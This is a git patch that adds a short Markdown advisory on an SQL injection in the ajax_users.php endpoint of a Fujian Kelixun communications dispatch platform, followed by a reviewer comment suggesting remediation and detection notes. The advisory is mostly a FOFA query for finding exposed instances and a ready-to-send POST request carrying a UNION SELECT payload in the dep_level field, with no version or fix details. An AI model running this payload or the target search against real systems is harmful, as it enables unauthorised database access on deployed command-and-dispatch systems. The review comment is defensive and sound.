From 2679e0784df18d349022b63a2197168db6983498 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Thu, 9 May 2024 09:03:53 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E7=A6=8F=E5=BB=BA=E7=A7=91=E7=AB=8B?= =?UTF-8?q?=E8=AE=AF=E9=80=9A=E4=BF=A1=E6=8C=87=E6=8C=A5=E8=B0=83=E5=BA=A6?= =?UTF-8?q?=E7=AE=A1=E7=90=86=E5=B9=B3=E5=8F=B0ajax=5Fusers.php=E5=AD=98?= =?UTF-8?q?=E5=9C=A8SQL=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...信指挥调度管理平台ajax_users.php存在SQL注入漏洞.md | 16 ++++++++++++++++
1 file changed, 16 insertions(+)
create mode 100644 福建科立讯通信指挥调度管理平台ajax_users.php存在SQL注入漏洞.md
diff --git a/福建科立讯通信指挥调度管理平台ajax_users.php存在SQL注入漏洞.md b/福建科立讯通信指挥调度管理平台ajax_users.php存在SQL注入漏洞.md
new file mode 100644
index 0000000..7ce075c
--- /dev/null
+++ b/福建科立讯通信指挥调度管理平台ajax_users.php存在SQL注入漏洞.md
@@ -0,0 +1,16 @@
+## 福建科立讯通信指挥调度管理平台ajax_users.php存在SQL注入漏洞
+
+## fofa
+```
+body="app/structure/departments.php"||app="指挥调度管理平台"
+```
+
+## poc
+```
+POST /app/ext/ajax_users.php HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
+Content-Type: application/x-www-form-urlencoded
+
+dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
+```
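Review bot: The new advisory ends at the request in the `## poc` block and records nothing a defender can act on: no affected version, no fix status, and no statement of whether `/app/ext/ajax_users.php` is reachable without a session. I would add a short remediation section after the PoC, for example a `## 修复建议` heading followed by a line saying that `dep_level` must be bound as a query parameter (and, if it is presumably numeric, validated as an integer) in `ajax_users.php`, and that the `/app/ext/` endpoints should not be exposed to untrusted networks until the vendor ships a fix. A detection line would help as well: POST bodies to that path in which `dep_level` carries a quote or `UNION`/`SELECT` keywords, and responses containing a tilde-delimited 32-hex-digit string, are what this request produces. The root cause described here is inferred from the payload shape (`1')` closing a quoted, parenthesised value); the PHP source is not part of the patch.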